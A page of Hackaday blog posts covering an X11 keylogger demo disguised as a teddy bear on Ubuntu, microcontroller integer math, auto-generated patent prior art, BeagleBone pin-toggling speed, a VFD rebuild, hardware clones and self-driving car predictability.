This Teddy Bear Steals Your Ubuntu Secrets

Ubuntu just came out with the new long-term support version of their desktop Linux operating system. It’s got a few newish features, including incorporating the “snap” package management format. One of the claims about “snaps” is that they’re more secure — being installed read-only and essentially self-contained makes them harder to hack across applications. In principle.

[mjg59] took issue with their claims of increased cross-application security. And rather than just moan, he patched together an exploit that’s disguised as a lovable teddy bear. The central flaw is something like twenty years old now; X11 has no sense of permissions and any X11 application can listen in on the keyboard and mouse at any time, regardless of which application the user thinks they’re providing input to. This makes writing keylogging and command-insertion trojans effortless, which is just what [mjg59] did. You can download a harmless version of the demo at [mjg59]’s GitHub.

This flaw in X11 is well-known. In some sense, there’s nothing new here. It’s only in light of Ubuntu’s claim of cross-application security that it’s interesting to bring this up again.

xeyes

And the teddy bear in question? Xteddy dates back from when it was cool to display a static image in a window on a workstation computer. It’s like a warmer, cuddlier version of Xeyes. Except it just sits there. Or, in [mjg59]’s version, it records your keystrokes and uploads your passwords to shady underground characters or TLAs.

We discussed Snappy Core for IoT devices previously, and we think it’s a step in the right direction towards building a system where all the moving parts are only loosely connected to each other, which makes upgrading part of your system possible without upgrading (or downgrading) the whole thing. It probably does enhance security when coupled with a newer display manager like Mir or Wayland. But as [mjg59] pointed out, “snaps” alone don’t patch up X11’s security holes.

Embed With Elliot: Keeping It Integral

If there’s one thing that a lot of small microcontrollers hate (and that includes the AVR-based Arduini), it’s floating-point numbers. And if there’s another thing they hate it’s division. For instance, dividing 72.3 by 12.9 on an Arduino UNO takes around 32 microseconds and 500 bytes, while dividing 72 by 13 takes 14 microseconds and 86 bytes. Multiplying 72 by 12 takes a bit under 2.2 microseconds. So roughly speaking, dividing floats is twice as slow as dividing (16-bit) integers, and dividing at all is five to seven times slower than multiplying.

There’s a whole lot of the time that you just don’t care about speed. For instance, if you’re doing a calculation that only runs infrequently, it doesn’t matter if you’re using floats or slow division routines. But if you ever find yourself in a tight loop that’s using floating-point math and/or doing division, and you need to get a bit more speed, I’ve got some tips for you.

Some of these tips (in particular the integer division tricks at the end) are arcane wizardry — only to be used when the situation really calls for it. But if you’re doing the same calculations repeatedly, you can often gain a lot just by giving the microcontroller numbers in the format it natively understands. Have a little sympathy for the poor little silicon beasties trapped inside!

Continue reading “Embed With Elliot: Keeping It Integral”

All Prior Art

Disclosed herein is a device for gauging medication dosage. The method may include displaying first, second and third navigation controls. A switch is connected in parallel to the relay contacts and is configured for providing a portion of the input power as supplemental load power to the output as a function of back EMF energy.

We’ve had patents on the mind lately, and have been reading a fair few of them. If you read patent language long enough, though, it all starts to turn into word-salad. But with his All Prior Art and All the Claims websites, [Alexander Reben] tosses this salad for real. He’s got computers parsing existing patents and randomly reassembling them.

Rather than hoping that his algorithm comes up with the next great idea, [Alexander] is hoping to nip the truly trivial ones in the bud. Because prior art — the sum of all pre-existing ideas — is enough to disqualify a patent, if an idea is so trivial that his algorithm could have come up with it, it’s sooner or later going to be off the table.

Most of the results are insane, of course. And it seems to be producing a patent at a rate of about one per 10-15 seconds, so we’re guessing that it’ll take quite a few years for these cyber-monkeys to come up with the works of Shakespeare. But with bogus and over-broad patents filtering through the system every day, it’s not implausible that some day it’ll prove useful.

[Via New Scientist, thanks Frank!]

BeagleBone Pin-Toggling Torture Test

Benchmarks often get criticized for their inability to perfectly model the real-world situations that we’d like them to. So take what follows in the limited scope that it’s intended, and don’t read too much into it. [Joonas Pihlajamaa]’s experiments with toggling a hardware pin as fast as possible on different single-board computers can still show us something.

The take-home result won’t surprise anyone who’s worked with a single-board computer: the higher-level interfaces are simply slow compared to direct memory-mapped GPIO access. But really slow. We’re talking around 5 kHz from Python or any of the file-based interfaces to the pins versus 3 MHz for direct access. Worse, as you’d expect when a non-realtime operating system is in the middle, there are glitches on the order of ten milliseconds with all the file-based methods.

This test only tells us so much, though, and it’s not really taking advantage of the BeagleBone Black’s ace in the hole, the PRUs — onboard hardware processors that bring real-time IO capabilities to the system. We’d like to see a re-write of the code to take advantage of libpruio, for instance. A 20 MHz square wave is a piece of cake with the PRUs.

Of course, it’s not interacting, which is probably in the spirit of the benchmark as written. But if raw hardware speed on a BeagleBone is the goal, it’s likely that the PRUs are going to feature prominently in the solution.

[Sprite_tm] Gives Near Death VFD A Better Second Life

[Sprite_tm] picked up some used VFD displays for cheap, and wanted to make his own custom temperature and air-quality display. He did that, of course, but turned it into a colossal experiment in re-design to boot. What started out as a $6 used VFD becomes priceless with the addition of hours of high-powered hacking mojo.

You see, the phosphor screen had burnt-in spots where the old display was left static for too long. A normal person would either live with it or buy new displays. [Sprite_tm] ripped off the old display driver and drives the row and column shift registers using the DMA module on a Raspberry Pi2, coding up his own fast PWM/BCM hybrid scheme that can do greyscale.

He mapped out the individual pixels using a camera and post processing in The Gimp to establish the degradation of burnt-in pixels. He then re-wrote a previous custom driver project to compensate for the pixels’ inherent brightness in firmware. After all that work, he wrapped the whole thing up in a nice wooden frame.

There’s a lot to read, so just go hit up his website. High points include the shift-register-based driver transplant, the bit-angle modulation that was needed to get the necessary bit-depth for the grayscale, and the PHP script that does the photograph-based brightness correction.

Picking a favorite [Sprite_tm] hack is like picking a favorite ice-cream flavor: they’re all good. But his investigation into hard-drive controller chips still makes our head spin just a little bit. If you missed his talks about the Tamagotchi Singularity from the Hackaday SuperCon make sure you drop what you’re doing and watch it now.

The Sincerest Form Of Flattery: Cloning Open-Source Hardware

We’re great proponents (and beneficiaries) of open-source hardware here at Hackaday. It’s impossible to overstate the impact that the free sharing of ideas has had on the hacker hardware scene. Plus, if you folks didn’t write up the cool projects that you’re making, we wouldn’t have nearly as much to write about.

We also love doing it ourselves. Whether this means actually etching the PCB or just designing it ourselves and sending it off to the fab, we’re not the types to pick up our electronics at the Buy More (except when we’re planning to tear them apart). And when we don’t DIY, we like our electrons artisanal because we like to support the little guy or girl out there doing cool design work.

So it’s with a moderately heavy heart that we’ll admit that when it comes to pre-built microcontroller and sensor boards, I buy a lot of cheap clones. Some of this is price sensitivity, to be sure. If I’m making many different one-off goofy projects, it just doesn’t make sense to pay the original-manufacturer premium over and over again for each one. A $2 microcontroller board just begs to be permanently incorporated into give-away projects in a way that a $20 board doesn’t. But I’m also positively impressed by some of the innovation coming out of some of the clone firms, to the point that I’m not sure that the “clone” moniker is fair any more.

This article is an attempt to come to grips with innovation, open source hardware, and the clones. I’m going to look at these issues from three different perspectives: the firm producing the hardware, the hacker hobbyist purchasing the hardware, and the innovative hobbyist who just wants to get a cool project out to as many people as possible. They say that imitation is the sincerest form of flattery, but can cloning go too far? To some extent, it depends on where you’re sitting.

Continue reading “The Sincerest Form Of Flattery: Cloning Open-Source Hardware”

The Predictability Problem With Self-Driving Cars

A law professor and an engineering professor walk into a bar. What comes out is a nuanced article on a downside of autonomous cars, and how to deal with it. The short version of their paper: self-driving cars need to be more predictable to humans in order to coexist.

We share living space with a lot of machines. A good number of them are mobile and dangerous but under complete human control: the car, for instance. When we want to know what another car at an intersection is going to do, we think about the driver of the car, and maybe even make eye contact to see that they see us. We then think about what we’d do in their place, and the traffic situation gets negotiated accordingly.

When its self-driving car got into an accident in February, Google replied that “our test driver believed the bus was going to slow or stop to allow us to merge into the traffic, and that there would be sufficient space to do that.” Apparently, so did the car, right before it drove out in front of an oncoming bus. The bus driver didn’t expect the car to pull (slowly) into its lane, either.

All of the other self-driving car accidents to date have been the fault of other drivers, and the authors think this is telling. If you unexpectedly brake all the time, you can probably expect to eventually get hit from behind. If people can’t read your car’s AI’s mind, you’re gonna get your fender bent.

The paper’s solution is to make autonomous vehicles more predictable, and they mention a number of obvious solutions, from “I-sense-you” lights to inter-car communication. But then there are aspects we hadn’t thought about: specific markings that indicate the AIs capabilities, for instance. A cyclist signalling a left turn would really like to know if the car behind has the new bicyclist-handsignal-recognition upgrade before entering the lane. The ability to put your mind into the mind of the other car is crucial, and requires tons of information about the driver.

All of this may require and involve legislation. Intent and what all parties to an accident “should have known” are used in court to apportion blame in addition to the black-and-white of the law. When one of the parties is an AI, this gets murkier. How should you know what the algorithm should have been thinking? This is far from a solved problem, and it’s becoming more relevant.

We’ve written on the ethics of self-driving cars before, but simply in terms of their decision-making ability. This paper brings home the idea that we also need to be able to understand what they’re thinking, which is as much a human-interaction and legal problem as it is technological.

[Headline image: Google Self-Driving Car Project]